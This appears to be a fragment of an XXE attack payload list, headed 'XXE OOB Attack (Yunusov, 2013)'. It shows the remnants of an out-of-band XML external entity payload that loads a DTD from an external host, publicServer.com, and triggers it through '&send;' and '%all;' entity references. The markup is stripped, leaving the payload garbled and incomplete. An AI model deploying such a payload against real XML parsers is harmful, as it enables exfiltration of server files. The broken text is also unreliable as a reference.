XXE OOB Attack (Yunusov, 2013) &send; File stored on http://publicServer.com/parameterEntity_oob.dtd "> %all;